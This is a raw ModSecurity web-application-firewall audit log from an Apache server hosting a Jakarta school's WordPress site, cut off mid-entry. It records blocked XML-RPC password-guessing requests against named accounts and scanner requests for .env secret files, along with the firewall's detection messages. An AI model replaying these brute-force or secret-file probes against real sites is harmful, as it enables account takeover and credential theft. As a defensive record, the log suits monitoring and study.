Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7827ed77-Z-- --e0002e74-A-- [24/Apr/2025:23:51:23 +0700] aApsC8lQo524fhbIj1yDMQAAAAQ 103.236.140.4 54822 103.236.140.4 8181 --e0002e74-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --e0002e74-C-- wp.getUsersBlogs wakahumas ashley --e0002e74-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0002e74-E-- --e0002e74-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (120+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745513483369646 4562 (- - -) Stopwatch2: 1745513483369646 4562; combined=3233, p1=394, p2=2695, p3=0, p4=0, p5=84, sr=73, sw=60, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0002e74-Z-- --617f870e-A-- [24/Apr/2025:23:52:23 +0700] aApsR_iVYlyO1xhz7yOsPQAAAM4 103.236.140.4 57540 103.236.140.4 8181 --617f870e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --617f870e-C-- wp.getUsersBlogs wakahumas joseph --617f870e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --617f870e-E-- --617f870e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (137+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745513543307729 4642 (- - -) Stopwatch2: 1745513543307729 4642; combined=3247, p1=407, p2=2682, p3=0, p4=0, p5=92, sr=82, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --617f870e-Z-- --e4b4d13f-A-- [24/Apr/2025:23:53:23 +0700] aApsg_iVYlyO1xhz7yOs7wAAAMM 103.236.140.4 59954 103.236.140.4 8181 --e4b4d13f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --e4b4d13f-C-- wp.getUsersBlogs wakahumas celtic --e4b4d13f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e4b4d13f-E-- --e4b4d13f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (131+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745513603343515 5240 (- - -) Stopwatch2: 1745513603343515 5240; combined=3573, p1=419, p2=2973, p3=0, p4=0, p5=105, sr=91, sw=76, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e4b4d13f-Z-- --46e5be12-A-- [24/Apr/2025:23:54:23 +0700] aApsv95yz20UX9VrdZPFaQAAAFU 103.236.140.4 34306 103.236.140.4 8181 --46e5be12-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --46e5be12-C-- wp.getUsersBlogs wakasarpras Admin123 --46e5be12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --46e5be12-E-- --46e5be12-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (127+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745513663110036 4148 (- - -) Stopwatch2: 1745513663110036 4148; combined=2859, p1=410, p2=2310, p3=0, p4=0, p5=81, sr=71, sw=58, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --46e5be12-Z-- --7baaec18-A-- [24/Apr/2025:23:55:23 +0700] aAps-8lQo524fhbIj1yFzwAAABE 103.236.140.4 36880 103.236.140.4 8181 --7baaec18-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 230 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --7baaec18-C-- wp.getUsersBlogs wakasarpras Marketing2021 --7baaec18-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7baaec18-E-- --7baaec18-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (138+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745513723214825 4670 (- - -) Stopwatch2: 1745513723214825 4670; combined=3230, p1=411, p2=2672, p3=0, p4=0, p5=86, sr=84, sw=61, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7baaec18-Z-- --a7e41c40-A-- [24/Apr/2025:23:56:23 +0700] aAptN_iVYlyO1xhz7yOu_wAAAMg 103.236.140.4 39442 103.236.140.4 8181 --a7e41c40-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a7e41c40-C-- wp.getUsersBlogs wakasarpras Mypassword --a7e41c40-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a7e41c40-E-- --a7e41c40-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (114+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745513783024440 5095 (- - -) Stopwatch2: 1745513783024440 5095; combined=3442, p1=398, p2=2881, p3=0, p4=0, p5=94, sr=88, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a7e41c40-Z-- --b0f60144-A-- [24/Apr/2025:23:57:28 +0700] aApteN5yz20UX9VrdZPHEgAAAE4 103.236.140.4 42136 103.236.140.4 8181 --b0f60144-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --b0f60144-C-- wp.getUsersBlogs wakasarpras 2011 --b0f60144-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b0f60144-E-- --b0f60144-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (82+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745513848256007 5102 (- - -) Stopwatch2: 1745513848256007 5102; combined=3870, p1=447, p2=3221, p3=0, p4=0, p5=116, sr=106, sw=86, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b0f60144-Z-- --1466f707-A-- [24/Apr/2025:23:57:51 +0700] aAptj8lQo524fhbIj1yHRQAAAAA 103.236.140.4 43088 103.236.140.4 8181 --1466f707-B-- GET /.env.dev.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.148.10.97 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.148.10.97 X-Forwarded-Proto: http Connection: close User-Agent: l9explore/1.2.2 --1466f707-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1466f707-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745513871371813 696 (- - -) Stopwatch2: 1745513871371813 696; combined=258, p1=231, p2=0, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1466f707-Z-- --3094fe36-A-- [24/Apr/2025:23:57:51 +0700] aAptj2Luk3f9kLjsdTaEUQAAAIo 103.236.140.4 43114 103.236.140.4 8181 --3094fe36-B-- GET /.env.template HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.148.10.97 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.148.10.97 X-Forwarded-Proto: http Connection: close User-Agent: l9explore/1.2.2 --3094fe36-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3094fe36-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745513871834080 800 (- - -) Stopwatch2: 1745513871834080 800; combined=353, p1=315, p2=0, p3=0, p4=0, p5=37, sr=136, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3094fe36-Z-- --5c782d11-A-- [24/Apr/2025:23:57:52 +0700] aAptkMlQo524fhbIj1yHRgAAAAY 103.236.140.4 43134 103.236.140.4 8181 --5c782d11-B-- GET /.env.sandbox HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.148.10.97 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.148.10.97 X-Forwarded-Proto: http Connection: close User-Agent: l9explore/1.2.2 --5c782d11-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5c782d11-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745513872314791 704 (- - -) Stopwatch2: 1745513872314791 704; combined=297, p1=252, p2=0, p3=0, p4=0, p5=45, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5c782d11-Z-- --bee1005f-A-- [24/Apr/2025:23:57:53 +0700] aAptkfiVYlyO1xhz7yOwHwAAAM8 103.236.140.4 43202 103.236.140.4 8181 --bee1005f-B-- GET /.env.bak HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.148.10.97 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.148.10.97 X-Forwarded-Proto: http Connection: close User-Agent: l9explore/1.2.2 --bee1005f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bee1005f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745513873769766 787 (- - -) Stopwatch2: 1745513873769766 787; combined=308, p1=267, p2=0, p3=0, p4=0, p5=41, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bee1005f-Z-- --76a8c210-A-- [24/Apr/2025:23:57:54 +0700] aAptkt5yz20UX9VrdZPHlQAAAEQ 103.236.140.4 43226 103.236.140.4 8181 --76a8c210-B-- GET /.env.preprod HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.148.10.97 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.148.10.97 X-Forwarded-Proto: http Connection: close User-Agent: l9explore/1.2.2 --76a8c210-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --76a8c210-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745513874318226 746 (- - -) Stopwatch2: 1745513874318226 746; combined=314, p1=262, p2=0, p3=0, p4=0, p5=51, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --76a8c210-Z-- --26f4946c-A-- [24/Apr/2025:23:57:54 +0700] aAptkslQo524fhbIj1yHVAAAAA4 103.236.140.4 43248 103.236.140.4 8181 --26f4946c-B-- GET /config/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.148.10.97 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.148.10.97 X-Forwarded-Proto: http Connection: close User-Agent: l9explore/1.2.2 --26f4946c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --26f4946c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745513874911692 820 (- - -) Stopwatch2: 1745513874911692 820; combined=307, p1=270, p2=0, p3=0, p4=0, p5=36, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --26f4946c-Z-- --3f599634-A-- [24/Apr/2025:23:57:55 +0700] aAptk95yz20UX9VrdZPHlgAAAFA 103.236.140.4 43264 103.236.140.4 8181 --3f599634-B-- GET /.env_sample HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.148.10.97 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.148.10.97 X-Forwarded-Proto: http Connection: close User-Agent: l9explore/1.2.2 --3f599634-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f599634-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745513875330822 1167 (- - -) Stopwatch2: 1745513875330822 1167; combined=357, p1=290, p2=0, p3=0, p4=0, p5=67, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f599634-Z-- --e9c46728-A-- [24/Apr/2025:23:57:55 +0700] aAptk8lQo524fhbIj1yHWgAAABI 103.236.140.4 43298 103.236.140.4 8181 --e9c46728-B-- GET /prod/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.148.10.97 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.148.10.97 X-Forwarded-Proto: http Connection: close User-Agent: l9explore/1.2.2 --e9c46728-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e9c46728-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745513875930964 753 (- - -) Stopwatch2: 1745513875930964 753; combined=292, p1=255, p2=0, p3=0, p4=0, p5=36, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e9c46728-Z-- --25d25f15-A-- [24/Apr/2025:23:58:28 +0700] aApttPiVYlyO1xhz7yOw-gAAAMc 103.236.140.4 44606 103.236.140.4 8181 --25d25f15-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --25d25f15-C-- wp.getUsersBlogs wakasarpras nimda --25d25f15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --25d25f15-E-- --25d25f15-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (92+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745513908061559 5299 (- - -) Stopwatch2: 1745513908061559 5299; combined=3824, p1=446, p2=3199, p3=0, p4=0, p5=104, sr=86, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --25d25f15-Z-- --ced65622-A-- [24/Apr/2025:23:59:28 +0700] aApt8PiVYlyO1xhz7yOxzQAAAMw 103.236.140.4 47172 103.236.140.4 8181 --ced65622-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ced65622-C-- wp.getUsersBlogs wakasarpras admin!@# --ced65622-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ced65622-E-- --ced65622-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (126+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745513968301345 5403 (- - -) Stopwatch2: 1745513968301345 5403; combined=3819, p1=443, p2=3203, p3=0, p4=0, p5=101, sr=85, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ced65622-Z-- --d94cfc13-A-- [24/Apr/2025:23:59:33 +0700] aApt9clQo524fhbIj1yIQAAAABU 103.236.140.4 47380 103.236.140.4 8181 --d94cfc13-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d94cfc13-C-- wp.getUsersBlogs wakasarpras 1234%^&* --d94cfc13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d94cfc13-E-- --d94cfc13-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 